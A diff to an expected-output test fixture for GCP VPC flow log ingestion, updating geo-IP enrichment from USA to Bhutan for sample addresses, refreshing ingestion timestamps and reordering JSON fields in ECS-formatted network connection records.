"{\"insertId\":\"ut8lbrffooxz1\",\"jsonPayload\":{\"bytes_sent\":\"186151\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", 
@@ -607,11 +627,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -689,7 +714,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391191600Z", + "ingested": "2021-12-14T14:43:27.415174224Z", "original": "{\"insertId\":\"ut8lbrffooxyp\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"92\",\"reporter\":\"SRC\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469099728Z", 
@@ -711,11 +736,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -787,7 +817,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391196Z", + "ingested": "2021-12-14T14:43:27.415174721Z", "original": "{\"insertId\":\"ut8lbrffooxzd\",\"jsonPayload\":{\"bytes_sent\":\"250864\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500506974Z", 
@@ -809,11 +839,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -885,7 +920,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391200100Z", + "ingested": "2021-12-14T14:43:27.415175106Z", "original": "{\"insertId\":\"ut8lbrffooxz8\",\"jsonPayload\":{\"bytes_sent\":\"167939\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"63\",\"reporter\":\"DEST\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469099728Z", 
@@ -896,9 +931,36 @@ } }, { + "@timestamp": "2019-06-14T03:50:10.845Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.2.23", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST" + } + }, "destination": { "address": "10.139.99.242", "port": 22, 
@@ -921,6 +983,16 @@ "ip": "192.168.2.23", "packets": 3 }, + "event": { + "ingested": "2021-12-14T14:43:27.415175587Z", + "original": "{\"insertId\":\"ut8lbrffooxyt\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.23\",\"src_port\":59679},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:45.860349247Z", + "end": "2019-06-14T03:40:46.031032701Z", + "id": "ut8lbrffooxyt", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -932,43 +1004,6 @@ "iana_number": "6", "packets": 3, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:10.845Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.2.23", - "10.139.99.242" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST" - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391203800Z", - "original": "{\"insertId\":\"ut8lbrffooxyt\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.23\",\"src_port\":59679},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:45.860349247Z", - "end": "2019-06-14T03:40:46.031032701Z", - "id": "ut8lbrffooxyt", - "category": "network", - "type": "connection" } }, { 
@@ -983,11 +1018,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33576, @@ -1059,7 +1099,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391207800Z", + "ingested": "2021-12-14T14:43:27.415176251Z", "original": "{\"insertId\":\"ut8lbrffooxz5\",\"jsonPayload\":{\"bytes_sent\":\"11773\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510622432Z", 
@@ -1081,11 +1121,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33562, @@ -1157,7 +1202,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391211200Z", + "ingested": "2021-12-14T14:43:27.415176789Z", "original": "{\"insertId\":\"ut8lbrffooxza\",\"jsonPayload\":{\"bytes_sent\":\"65699\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074897435Z", 
@@ -1173,11 +1218,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -1255,7 +1305,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391215700Z", + "ingested": "2021-12-14T14:43:27.415177309Z", "original": "{\"insertId\":\"ut8lbrffooxyq\",\"jsonPayload\":{\"bytes_sent\":\"66029\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", 
@@ -1271,11 +1321,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -1353,7 +1408,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391221400Z", + "ingested": "2021-12-14T14:43:27.415177776Z", "original": "{\"insertId\":\"ut8lbrffooxz2\",\"jsonPayload\":{\"bytes_sent\":\"65154\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150720950Z", 
@@ -1369,11 +1424,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -1451,7 +1511,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391226900Z", + "ingested": "2021-12-14T14:43:27.415178222Z", "original": "{\"insertId\":\"ut8lbrffooxyo\",\"jsonPayload\":{\"bytes_sent\":\"13643\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"99\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466657665Z", 
@@ -1462,34 +1522,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.49.136.133", - "port": 46864, - "domain": "simianhacker-demo", - "ip": "10.49.136.133" - }, - "source": { - "address": "67.43.156.13", - "port": 9243, - "bytes": 34509840, - "packets": 8690, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", - "bytes": 34509840, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 8690, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -1500,6 +1532,9 @@ "10.49.136.133" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -1520,53 +1555,55 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391232500Z", - "original": "{\"insertId\":\"ut8lbrffooxzc\",\"jsonPayload\":{\"bytes_sent\":\"34509840\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":46864,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:29.432367659Z\",\"packets_sent\":\"8690\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"start_time\":\"2019-06-14T03:40:17.343890802Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:17.343890802Z", - "end": "2019-06-14T03:49:29.432367659Z", - "id": "ut8lbrffooxzc", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" + "address": "10.49.136.133", + "port": 46864, + "domain": "simianhacker-demo", + "ip": "10.49.136.133" }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", - "port": 34836, - "bytes": 1467, + "port": 9243, + "bytes": 34509840, "ip": "67.43.156.13", - 
"packets": 7 + "packets": 8690 + }, + "event": { + "ingested": "2021-12-14T14:43:27.415178789Z", + "original": "{\"insertId\":\"ut8lbrffooxzc\",\"jsonPayload\":{\"bytes_sent\":\"34509840\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":46864,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:29.432367659Z\",\"packets_sent\":\"8690\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"start_time\":\"2019-06-14T03:40:17.343890802Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:17.343890802Z", + "end": "2019-06-14T03:49:29.432367659Z", + "id": "ut8lbrffooxzc", + "category": "network", + "type": "connection" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", - "bytes": 1467, + "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", + "bytes": 34509840, "transport": "tcp", "type": "ipv4", "iana_number": "6", - "packets": 7, + "packets": 8690, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -1577,6 +1614,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -1597,8 +1637,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 34836, + "bytes": 1467, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391238100Z", + "ingested": "2021-12-14T14:43:27.415180588Z", "original": "{\"insertId\":\"ut8lbrffooxz7\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34836},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:48:38.961050187Z", 
@@ -1606,6 +1671,18 @@ "id": "ut8lbrffooxz7", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", + "bytes": 1467, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -1614,11 +1691,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
